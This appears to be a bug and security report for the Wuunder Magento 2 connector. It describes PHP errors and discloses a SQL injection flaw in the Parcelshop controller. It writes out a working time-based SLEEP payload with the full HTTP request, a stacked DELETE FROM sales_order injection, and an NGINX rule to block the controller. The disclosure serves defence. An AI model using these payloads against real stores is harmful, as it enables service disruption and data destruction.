After installing, in the backend the order grid is broken and displays the following message:

Notice: Undefined index: label_id in /vendor/wuunder/magento2-connector/Ui/Component/Listing/Column/Status.php on line 45

On the checkout page at shipping step: parcelshop.js will throw an error:
VM21357:1 Uncaught SyntaxError: Unexpected token < in JSON at position 0
at JSON.parse ()
at _markupParcelshopAddress (parcelshop.js:153)
at Object.success (parcelshop.js:59)
at fire (jquery.js:3232)
at Object.fireWith [as resolveWith] (jquery.js:3362)
at done (jquery.js:9840)
at XMLHttpRequest.callback (jquery.js:10311)

that is because parcelshopData that is passed to JSON.parse contains the following error:

Fatal error: Uncaught Exception: Notice: Undefined variable: address in /vendor/wuunder/magento2-connector/Controller/Index/Parcelshop.php on line 179 in vendor/magento/framework/App/ErrorHandler.php on line 61

Introduction

During a QA review we found a possible SQL injection flaw in the Parcelshop controller. SQL queries are being built using bare string concatenation, with no escaping at all.

We went digging deeper and tried several methods to abuse the security flaw. Here are our findings.

Security Flaws

SQL Sleep Injection

We managed to build a SQL Sleep Injection query like the following:

SELECT * FROM wuunder_quote_id WHERE quote_id = '' AND CASE 5 WHEN 5 THEN SLEEP(60) END OR ''

We managed to increase the response time of the request by 60 seconds. Imagine executing this at a larger scale..

Request information

POST http://www.example.com/wuunder/index/parcelshop/setParcelshopId
Connection: keep-alive
Accept: */*
Origin: http://www.example.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://www.example.com/checkout/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,nl;q=0.8,de;q=0.7,fr;q=0.6,es;q=0.5
Cookie: ...
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

parcelshopId=cb927986-6281-4f4a-b2f0-ddfc16ce0642&quoteId='AND%20CASE%205%20WHEN%205%20THEN%20SLEEP%2860%29%20END%20OR%20'

SQL Update Injection

We also managed to build a SQL Update Injection query like the following:

SELECT * FROM wuunder_quote_id WHERE quote_id = '' OR 1=1; DELETE FROM sales_order WHERE order_id != ''

In your luck, Magento has you covered due to the fact that fetchAll() and query() are not able to execute multiple queries.

Flaws in code

• checkIfQuoteExists()
• updateParcelshopId()
• getParcelshopAddressForQuote()

Solution

I will provide a solution this week. For now I suggest disabling the parcel functionality and blocking the controller on webserver level.

NGINX

location /wuunder/index/parcelshop {
  deny all;
}